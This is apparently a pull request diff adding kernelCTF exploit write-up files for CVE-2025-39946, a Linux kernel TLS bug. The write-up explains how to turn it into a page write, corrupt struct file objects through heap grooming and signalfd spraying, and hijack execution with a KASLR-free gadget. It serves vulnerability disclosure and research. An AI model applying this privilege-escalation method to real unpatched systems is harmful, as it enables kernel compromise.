Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
143 changes: 143 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-39946_mitigation/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,143 @@
# CVE-2025-39946

Exploit documentation for `CVE-2025-39946` against `mitigation-v3b-6.1.55`.

As stated in the `vulnerability.md` documentation, the bug behind
`CVE-2025-39946` causes use of uninitialized data and potentially out-of-bounds
accesses. For exploitation we will focus on the uninitialized data in the
`struct skb_shared_info.frags[]` array.
TLS manages the first 5 fragments for internal use, however fragments after that
are accessible to us because of the bug described.
In order to exploit this, we will first groom the heap so that the next fragment
has some controlled value. We then try to re-use this fragment page so that we
can trigger a page write corrupting kernel data.
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can you explain how this works? vulnerability.md says that you have an OOB read of uninitialized data. How do we go from that to an out-of-bounds write?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I added more details about the vuln in vulnerability.md. Please see if this info is enough. Also note the exploit comments regarding this.


## Page Write Targets

With the primitive outlined above (essentially a one-shot use-after-free page
write primitive), we need to find a useful page to write to.
There are two obvious choices for this:
- Page tables
- Slab backing pages

At the time of working on the exploit, page tables seemed to be too unstable due
to the one-shot nature of the write, which is why we will continue with the slab
backing pages. In hindsight, page tables were probably a good fit too.

Which slab do we target? Ideally the slab would contain objects that allow
trivial code execution or other memory write primitives. Additionally the
objects for the slab should be allocatable without too much noise in other
slabs, because we do not want to accidently corrupt another slab.
Finally, we need to ensure that the same pages used for the slab can be allocated
for for skb fragments.

Considering all of the above, I went for `struct file` objects:
- They can be allocated rather easily by opening files and we can allocate quite
many
- Files are allocated from a dedicated `kmem_cache`, thus we are sure to only
corrupt file objects aiding stability.
- Files contain a `f_op` vtable, allowing direct rip control.
- File slabs are backed by order 0 pages, which can be allocated easily from
userspace using pipes.

One downside of files is the fact that we cannot allocate files without
allocating inodes too. This is a problem because every file allocation will
result in the allocation of a `struct dentry` which essentially means our page
write might accidently hit a different slab.

## Heap Grooming

In order to get a fragment at the right position we want to have skbs with 6
fragments, so that the last fragment can be picked up by the file slab.
To get the controlled fragments into an skb, we create pipes and fill exactly 5
pages. Pipe buffers are backed by order 0 pages which matches the file slab
`kmem_cache` order. After that we add another partially filled page which will
be the page used for triggering the overwrite.
We then splice those pages onto an skb for the expected fragment layout.

The final page needs to be partially filled so that there is some space left to
write. We will fill the page exactly to the alignment of the `struct file`
objects in the slab. Thus the next write starts at the next `struct file`
object, and will corrupt all the files in the rest of the slab.

For increased chance of hitting the right pages, we will repeat the above for
N (= 16) pipes. We fill all of them and then release the skbs one by one,
immediatly picking each up with a new `struct tls_strparser`. Since the last
freed object will be the first on the freelist, it is very likely that the TLS
socket picks up the prepared skb.

## File Slab Spray

Now that each TLS socket is readily equipped with a prepared skb, we want to
spray file slabs so that new slabs will pick up pages that were released from
the pipe buffers earlier.
For files to allocate we will choose `signalfd`s. Those are a decent choice
because they are rather simple with a small sized context such that we do not
allocate new slabs except for the `file` and the `dentry` slab. Furthermore
`signalfd`s provide an easy to use oracle ([1]) allowing us to check whether we
corrupted the file structure.

```c
static int do_signalfd4(int ufd, sigset_t *mask, int flags)
{
struct signalfd_ctx *ctx;

/* ... */

if (ufd == -1) {
/* ... */
} else {
struct fd f = fdget(ufd);
if (!f.file)
return -EBADF;
ctx = f.file->private_data;
if (f.file->f_op != &signalfd_fops) { // [1]
fdput(f);
return -EINVAL;
}
/* ... */
}
```

As mentioned earlier we cannot prevent allocation of `dentry` slabs when
allocating `signalfd`s. To prevent kernel panics because of corrupted `dentry`s
we will spray the `signalfd`s in a dedicated forked process which will live
forever in case we fail to find a corrupted file. This way we prevent any
accidental oops during cleanup.

## Triggering the Bug for the Page Write

Now that we hopefully have a `signalfd` with a file in a slab backed by the page
we placed into one of the skb fragments, we will trigger the bug as described in
the `vulnerability.md` document and write our payload for each skb set up.

For payload choice we will opt for a simple empty file that basically has
nothing but an `f_op` table that has a `flush` method populated and a reference
count of 1. When we close the file via `close()` we will reach `filp_close()`
which gives us RIP control.
We do not really need the reference count of exactly 1, we just need anything
greater than zero to bypass checks in `filp_close()`. Actually it is better to
choose a greater reference count to prevent the file destructor from running.
Since we will block the kernel in an infinite loop in our flush primitive, we do
not need to worry about that too much though.

As a RIP gadget we will utilize the "one gadget" technique described in great
detail in the [CVE-2025-21700 writeup](https://raw.githubusercontent.com/google/security-research/refs/heads/master/pocs/linux/kernelctf/CVE-2025-21700_lts_cos_mitigation/docs/novel-techniques.md).
Also note that this gadget does not need a KASLR bypass.

To create the `struct file_operations` pointer we will resort to the previously
documented deterministically known location of the exception stacks in the CPU
entry area. This issue has been documented several times (CVE-2023-0597).

After each write completed, we check each `signalfd` using the oracle described
above. If any of them got corrupted we trigger our payload by closing the file
descriptor.

## Stability Notes

Special care was taken to make the exploit repeatible if the page reclaim fails.
It should be close to 80% stable.
As a side note, the usage of the "one gadget" actually helps with the page
reclaim because it causes the PCP to drain, thus giving us more reliability in
the page allocation.

Original file line number Diff line number Diff line change
@@ -0,0 +1,77 @@
# CVE-2025-39946

- Requirements:
- Kernel configuration CONFIG_TLS
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84c61fe1a75b4255df1e1e7c054c9e6d048da417
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0aeb54ac4cd5cf8f60131b4d9ec0b6dc9c27b20d
- Affected Versions: 6.0-rc1 - 6.17-rc7
- URL: https://www.cve.org/CVERecord?id=CVE-2025-39946

In the kernel TLS implementation an issue was found when processing invalid
TLS records under network pressure. This behavior can be achieved
deterministically by forcing short reads via out-of-band data. The kernel
test case demonstrates this:

```c
TEST_F(tls_err, oob_pressure)
{
char buf[1<<16];
int i;

memrnd(buf, sizeof(buf));

EXPECT_EQ(send(self->fd2, buf, 5, MSG_OOB), 5);
EXPECT_EQ(send(self->fd2, buf, sizeof(buf), 0), sizeof(buf));
for (i = 0; i < 64; i++)
EXPECT_EQ(send(self->fd2, buf, 5, MSG_OOB), 5);
}
```

The problem manifests in the `tls_strp_copyin_frag` method. After entering
copy mode due to the initial short read (which is not large enough for parsing
the tls message size just yet) and partially receiving the large buffer, we
continue to copy out chunks from said large buffer. Problem is that TLS
pre-allocated the `skb_shinfo->frags` for only a fixed (small) TLS record and
fails to check whether the available fragments are already exhausted ([1]).
It then continues to copy the incoming data ([2]) regardless.
Finally, parsing the TLS header in `tls_rx_msg_size` is made to fail
returning an invalid size. This causes the copy loop to abort ([3]), however
will not abort the full message (lower layer TCP receive is not interrupted).
A following read triggered by other incoming OOB messages forces reentry into
`tls_strp_copyin_frag` eventually exhausting the available fragments initialized
causing reads of uninitialized data or out-of-bounds reads after the
`skb_shared_info` structure.
Since fragments are basically raw pages, this indirectly yields a page write
primitive via uninitialized fragments ([2]) or potentially crafted out-of-bounds
fragments.

```c
static int tls_strp_copyin_frag(struct tls_strparser *strp, struct sk_buff *skb,
struct sk_buff *in_skb, unsigned int offset,
size_t in_len)
{
size_t len, chunk;
skb_frag_t *frag;
int sz;

frag = &skb_shinfo(skb)->frags[skb->len / PAGE_SIZE]; // [1]

len = in_len;
/* First make sure we got the header */
if (!strp->stm.full_len) {
/* Assume one page is more than enough for headers */
chunk = min_t(size_t, len, PAGE_SIZE - skb_frag_size(frag));
WARN_ON_ONCE(skb_copy_bits(in_skb, offset,
skb_frag_address(frag) +
skb_frag_size(frag),
chunk)); // [2]

skb->len += chunk;
skb->data_len += chunk;
skb_frag_size_add(frag, chunk);

sz = tls_rx_msg_size(strp, skb);
if (sz < 0)
return sz; // [3]
/*...*/
```
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
SRC := exploit.c

exploit: $(SRC)
$(CC) -O2 -static -s -Wall -o $@ $^

exploit_debug: $(SRC)
$(CC) -O2 -static -ggdb -Wall -o $@ $^

rip: rip.c
# needs clang to compile
clang -O3 -o $@ $<

# apparently this is needed for the CI
prerequisites:

Binary file not shown.
Loading
Loading